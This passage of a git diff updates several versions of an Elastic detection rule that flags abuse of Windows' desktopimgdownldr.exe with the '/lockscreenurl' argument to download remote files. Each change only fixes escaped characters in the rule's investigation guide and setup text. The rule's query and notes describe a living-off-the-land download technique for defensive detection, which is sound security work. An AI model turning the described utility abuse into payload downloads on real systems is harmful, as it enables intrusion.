Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. 
However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - 
Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"desktopimgdownldr.exe\" or process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n", "references": [ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/" 
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_106.json b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_106.json
index f8295b85551..69484889d41 100644
--- a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_106.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Desktopimgdownldr Utility", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE 
'%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. 
However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - 
Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"desktopimgdownldr.exe\" or process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n", "references": [ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/" 
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_107.json b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_107.json
index 365d63d5c70..027b465ca98 100644
--- a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_107.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Desktopimgdownldr Utility", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE 
'%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. 
However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - 
Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"desktopimgdownldr.exe\" or process.pe.original_file_name == \"desktopimgdownldr.exe\") and\n process.args : \"/lockscreenurl:http*\"\n", "references": [ "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/" 
@@ -58,7 +58,7 @@
 ],
 "risk_score": 47,
 "rule_id": "15c0b7a7-9c34-4869-b25b-fa6518414899",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
diff --git a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_108.json b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_108.json
index 9e60992b092..b1a2301a0f5 100644
--- a/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/15c0b7a7-9c34-4869-b25b-fa6518414899_108.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Download via Desktopimgdownldr Utility", - "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThe `Desktopimgdownldr.exe` utility is used to to configure lockscreen/desktop image, and can be abused with the `lockscreenurl` argument to download remote files and tools, this rule looks for this behavior.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Check the reputation of the domain or IP address used to host the downloaded file or if the user downloaded the file from an internal system.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE 
'%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Analysts can dismiss the alert if the downloaded file is a legitimate image.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Desktopimgdownldr Utility\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. 
